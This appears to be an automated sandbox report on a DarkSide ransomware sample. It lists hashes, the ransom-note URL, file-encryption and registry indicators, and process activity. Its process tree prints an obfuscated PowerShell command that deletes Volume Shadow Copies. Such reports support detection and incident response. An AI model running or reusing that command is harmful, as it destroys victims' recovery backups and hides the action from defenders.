Analysis
- max time kernel: 57s
- max time network: 81s
- platform: windows7_x64
- resource: win7v20210408
- submitted: 04-08-2021 17:54
Static task: static1
Behavioral task: behavioral1
  Sample: PurchaseOrderPoster.bin.exe
  Resource: win7v20210408
Behavioral task: behavioral2
  Sample: PurchaseOrderPoster.bin.exe
  Resource: win10v20210408
General
- Target: PurchaseOrderPoster.bin.exe
- Size: 30KB
- MD5: f00aded4c16c0e8c3b5adfc23d19c609
- SHA1: 86ca4973a98072c32db97c9433c16d405e4154ac
- SHA256: 4d9432e8a0ceb64c34b13d550251b8d9478ca784e50105dc0d729490fb861d1a
- SHA512: a2697c2b008af3c51db771ba130590e40de2b0c7ad6f18b5ba284edffdc7a38623b56bc24939bd3867a55a7d263b236e02d1f0d718a5d3625402f2325cbfbedf
Malware Config
Extracted
- Path: C:\\README.f2cbf9aa.TXT
- Family: darkside
- URL: http://darksidfqzcuhtk2.onion/OBB5DDMR8RB9DI2RYYF376YGBJAV2J4F2NXFEWPBSXY709MAA0MY7PMBBQJ0HVG3
Signatures
- DarkSide
  Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
- Modifies extensions of user files (15 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Processes: PurchaseOrderPoster.bin.exe
  description | ioc | process
  File renamed | C:\Users\Admin\Pictures\ExitUnpublish.crw => C:\Users\Admin\Pictures\ExitUnpublish.crw.f2cbf9aa | PurchaseOrderPoster.bin.exe
  File opened for modification | C:\Users\Admin\Pictures\ExitUnpublish.crw.f2cbf9aa | PurchaseOrderPoster.bin.exe
  File opened for modification | C:\Users\Admin\Pictures\ProtectGet.tiff | PurchaseOrderPoster.bin.exe
  File renamed | C:\Users\Admin\Pictures\ProtectGet.tiff => C:\Users\Admin\Pictures\ProtectGet.tiff.f2cbf9aa | PurchaseOrderPoster.bin.exe
  File renamed | C:\Users\Admin\Pictures\SubmitCheckpoint.raw => C:\Users\Admin\Pictures\SubmitCheckpoint.raw.f2cbf9aa | PurchaseOrderPoster.bin.exe
  File opened for modification | C:\Users\Admin\Pictures\DisableApprove.tif.f2cbf9aa | PurchaseOrderPoster.bin.exe
  File opened for modification | C:\Users\Admin\Pictures\DisconnectWait.crw.f2cbf9aa | PurchaseOrderPoster.bin.exe
  File renamed | C:\Users\Admin\Pictures\DisconnectWait.crw => C:\Users\Admin\Pictures\DisconnectWait.crw.f2cbf9aa | PurchaseOrderPoster.bin.exe
  File renamed | C:\Users\Admin\Pictures\RestoreGrant.raw => C:\Users\Admin\Pictures\RestoreGrant.raw.f2cbf9aa | PurchaseOrderPoster.bin.exe
  File opened for modification | C:\Users\Admin\Pictures\SubmitCheckpoint.raw.f2cbf9aa | PurchaseOrderPoster.bin.exe
  File opened for modification | C:\Users\Admin\Pictures\ConvertToUnregister.raw.f2cbf9aa | PurchaseOrderPoster.bin.exe
  File renamed | C:\Users\Admin\Pictures\DisableApprove.tif => C:\Users\Admin\Pictures\DisableApprove.tif.f2cbf9aa | PurchaseOrderPoster.bin.exe
  File opened for modification | C:\Users\Admin\Pictures\RestoreGrant.raw.f2cbf9aa | PurchaseOrderPoster.bin.exe
  File renamed | C:\Users\Admin\Pictures\ConvertToUnregister.raw => C:\Users\Admin\Pictures\ConvertToUnregister.raw.f2cbf9aa | PurchaseOrderPoster.bin.exe
  File opened for modification | C:\Users\Admin\Pictures\ProtectGet.tiff.f2cbf9aa | PurchaseOrderPoster.bin.exe
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Sets desktop wallpaper using registry (2 TTPs, 2 IoCs)
  Processes: PurchaseOrderPoster.bin.exe
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\f2cbf9aa.BMP" | PurchaseOrderPoster.bin.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\f2cbf9aa.BMP" | PurchaseOrderPoster.bin.exe
- Modifies Control Panel (1 IoCs)
  Processes: PurchaseOrderPoster.bin.exe
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Control Panel\Desktop\WallpaperStyle = "10" | PurchaseOrderPoster.bin.exe
- Modifies registry class (5 IoCs)
  Processes: PurchaseOrderPoster.bin.exe
  description | ioc | process
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\f2cbf9aa\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\f2cbf9aa.ico" | PurchaseOrderPoster.bin.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.f2cbf9aa | PurchaseOrderPoster.bin.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.f2cbf9aa\ = "f2cbf9aa" | PurchaseOrderPoster.bin.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\f2cbf9aa\DefaultIcon | PurchaseOrderPoster.bin.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\f2cbf9aa | PurchaseOrderPoster.bin.exe
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes: powershell.exe, PurchaseOrderPoster.bin.exe
  pid | process
  1688 | powershell.exe
  1688 | powershell.exe
  1972 | PurchaseOrderPoster.bin.exe
  1972 | PurchaseOrderPoster.bin.exe
- Suspicious use of AdjustPrivilegeToken (24 IoCs)
  Processes: PurchaseOrderPoster.bin.exe, powershell.exe, vssvc.exe
  description | pid | process
  Token: SeIncreaseQuotaPrivilege | 1972 | PurchaseOrderPoster.bin.exe
  Token: SeSecurityPrivilege | 1972 | PurchaseOrderPoster.bin.exe
  Token: SeTakeOwnershipPrivilege | 1972 | PurchaseOrderPoster.bin.exe
  Token: SeLoadDriverPrivilege | 1972 | PurchaseOrderPoster.bin.exe
  Token: SeSystemProfilePrivilege | 1972 | PurchaseOrderPoster.bin.exe
  Token: SeSystemtimePrivilege | 1972 | PurchaseOrderPoster.bin.exe
  Token: SeProfSingleProcessPrivilege | 1972 | PurchaseOrderPoster.bin.exe
  Token: SeIncBasePriorityPrivilege | 1972 | PurchaseOrderPoster.bin.exe
  Token: SeCreatePagefilePrivilege | 1972 | PurchaseOrderPoster.bin.exe
  Token: SeBackupPrivilege | 1972 | PurchaseOrderPoster.bin.exe
  Token: SeRestorePrivilege | 1972 | PurchaseOrderPoster.bin.exe
  Token: SeShutdownPrivilege | 1972 | PurchaseOrderPoster.bin.exe
  Token: SeDebugPrivilege | 1972 | PurchaseOrderPoster.bin.exe
  Token: SeSystemEnvironmentPrivilege | 1972 | PurchaseOrderPoster.bin.exe
  Token: SeRemoteShutdownPrivilege | 1972 | PurchaseOrderPoster.bin.exe
  Token: SeUndockPrivilege | 1972 | PurchaseOrderPoster.bin.exe
  Token: SeManageVolumePrivilege | 1972 | PurchaseOrderPoster.bin.exe
  Token: 33 | 1972 | PurchaseOrderPoster.bin.exe
  Token: 34 | 1972 | PurchaseOrderPoster.bin.exe
  Token: 35 | 1972 | PurchaseOrderPoster.bin.exe
  Token: SeDebugPrivilege | 1688 | powershell.exe
  Token: SeBackupPrivilege | 1180 | vssvc.exe
  Token: SeRestorePrivilege | 1180 | vssvc.exe
  Token: SeAuditPrivilege | 1180 | vssvc.exe
- Suspicious use of WriteProcessMemory (4 IoCs)
  Processes: PurchaseOrderPoster.bin.exe
  description | pid | process | target process
  PID 1972 wrote to memory of 1688 | 1972 | PurchaseOrderPoster.bin.exe | powershell.exe
  PID 1972 wrote to memory of 1688 | 1972 | PurchaseOrderPoster.bin.exe | powershell.exe
  PID 1972 wrote to memory of 1688 | 1972 | PurchaseOrderPoster.bin.exe | powershell.exe
  PID 1972 wrote to memory of 1688 | 1972 | PurchaseOrderPoster.bin.exe | powershell.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe"
  PID: 1972
  - Modifies extensions of user files
  - Sets desktop wallpaper using registry
  - Modifies Control Panel
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - Child process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
    PID: 1688
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  PID: 1180
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
  MD5: b7546c0b9e4430370f293aaae4016784
  SHA1: 2dfdd1a95ed4b753d28678b4424e7d651c9361e2
  SHA256: 801f1c2f32246bd5bb02615b1fd8c385b73abbb29b29a20c47ef4be4a0e2e366
  SHA512: 03b0d992846adc4c00e9f44df5461dee27e1a40fe89c82f306240c89130598043df14ba352c1694f09fce3ae7d06ec5ae16ca548dc6ea14879f5fac000461175
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  MD5: 1c25162407082e257e436093bf54505f
  SHA1: 6d9ee3dca14d634e47dba967980b5a4c3f191d82
  SHA256: 0db98bca97c422ec840ad425b16a111afff3749eee9ed6589664234e8338b376
  SHA512: 0c12a5dd7dd1fbfda5da3cc31b5e66543daf0d4d38b82074b2a881fa250f02d7d2c4c80d9f132072f981c046c47318e5122ad97e49b01669f5830a8df12eada3